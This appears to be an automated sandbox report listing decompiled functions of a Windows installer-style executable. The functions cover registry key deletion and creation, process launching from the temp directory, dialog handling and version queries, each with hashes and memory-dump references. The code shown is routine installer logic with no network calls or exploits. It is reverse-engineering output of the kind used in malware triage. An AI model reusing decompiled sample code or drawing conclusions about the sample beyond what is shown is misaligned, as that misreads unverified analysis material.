Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768

Uniqueness

Uniqueness Score: -1.00%

Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}

0x00402af5
0x00402afd
0x00402b25
0x00402b0f
0x00402b56
0x00000000
0x00402b5e
0x00402b23
0x00000000
0x00000000
0x00402b23
0x00402b3a
0x00000000
0x00402b46
0x00402b50

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
RegCloseKey.ADVAPI32(?), ref: 00402B3A
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
RegCloseKey.ADVAPI32(?), ref: 00402B56

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d3e
0x00401d45
0x00401d74
0x00401d7c
0x00401d83
0x00401d83
0x00402932
0x0040293e

APIs

GetDlgItem.USER32 ref: 00401D38
GetClientRect.USER32 ref: 00401D45
LoadImageA.USER32 ref: 00401D66
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
DeleteObject.GDI32(00000000), ref: 00401D83

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404545, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
			}

0x0040454d
0x00404551
0x00404559
0x0040455c
0x0040455d
0x0040455f
0x00404561
0x00404564
0x00404564
0x0040456b
0x00404571
0x00404571
0x00404578
0x00404583
0x00404584
0x00404587
0x00404587
0x00404594
0x0040459f
0x004045a2
0x004045b4
0x004045bb
0x004045bc
0x004045cb
0x004045db
0x004045f7

APIs

lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
wsprintfA.USER32 ref: 004045DB
SetDlgItemTextA.USER32 ref: 004045EE

Strings

%u.%u%s%s, xrefs: 004045BD

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E0040591D();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x00401c19
0x00401c22
0x00401c2e
0x00401c31
0x00401c3b
0x00401c3b
0x00401c3e
0x00401c42
0x00401c4c
0x00401c4c
0x00401c4f
0x00401c53
0x00401c55
0x00401ca2
0x00401ca4
0x00401cad
0x00401cb5
0x00401cb8
0x00401cb8
0x00401cc1
0x00000000
0x00401c57
0x00401c5e
0x00401c60
0x00401c68
0x00401c6b
0x00401c93
0x00401cc7
0x00401cc7
0x00401c6d
0x00401c7b
0x00401c83
0x00401c86
0x00401c86
0x00401c6b
0x00401cca
0x00401ccd
0x00401cd3
0x004028d7
0x004028d7
0x00402932
0x0040293e

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93

Strings

!, xrefs: 00401C4F

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18

Uniqueness

Uniqueness Score: -1.00%

Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D62(0xffffffeb, _t13);
				_t15 = E00405247(_t28, "C:\\Users\\alfons\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040591D(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401ea2
0x00401ea7
0x00401eb2
0x00401eb9
0x00401ebc
0x004026da
0x00401ec2
0x00401ec5
0x00401ed6
0x00401ed1
0x00401ed1
0x00401eeb
0x00401ef4
0x00401f04
0x00401f06
0x00401f06
0x00401ef6
0x00401efa
0x00401efa
0x00401ef4
0x00401f0d
0x00401f10
0x00401f10
0x00402932
0x0040293e

APIs

Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E

Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
Part of subcall function 00405247: CreateProcessA.KERNEL32 ref: 00405283
Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290

WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
GetExitCodeProcess.KERNEL32 ref: 00401EEB
CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 4003922372-1943935188
Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00405247, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405247(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x7a1588->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}

0x00405250
0x0040525a
0x00405265
0x0040526b
0x0040526b
0x00405283
0x0040528b
0x00405290
0x00000000
0x00405296
0x0040529a

APIs

GetFileAttributesA.KERNEL32(?), ref: 0040525A
CreateProcessA.KERNEL32 ref: 00405283
CloseHandle.KERNEL32(?), ref: 00405290

Strings

Error launching installer, xrefs: 00405247

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCloseCreateFileHandleProcess
String ID: Error launching installer
API String ID: 2000254098-66219284
Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18

Uniqueness

Uniqueness Score: -1.00%

Function 004054CC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054CC(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x004054cd
0x004054e4
0x004054ec
0x004054ec
0x004054f4

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
lstrcatA.KERNEL32(?,00409010), ref: 004054EC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD

Uniqueness

Uniqueness Score: -1.00%

Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a418) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a418 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
				return 0;
			}

0x00402387
0x0040238c
0x00402396
0x004023a0
0x004023a3
0x004023b5
0x004023bc
0x004023c4
0x004023d2
0x004023d6
0x004023e1
0x004023e1
0x004023e5
0x004023e9
0x004023ef
0x004023f4
0x004023f4
0x004023f8
0x00402404
0x00402404
0x0040241d
0x0040241f
0x0040241f
0x00402422
0x004024fb
0x004024fb
0x00402932
0x0040293e

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68

Uniqueness

Uniqueness Score: -1.00%

Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x00401f50
0x00401f53
0x00401f5b
0x00401f60
0x00401f65
0x00401f69
0x00401f6c
0x00401f6e
0x00401f75
0x00401f7e
0x00401f86
0x00401f89
0x00401f9e
0x00401fa4
0x00401fb7
0x00401fc0
0x00401fcc
0x00401fd1
0x00401fd1
0x00401fb7
0x00401fd4
0x00401be1
0x00401be1
0x00401f89
0x00402932
0x0040293e

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0

Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
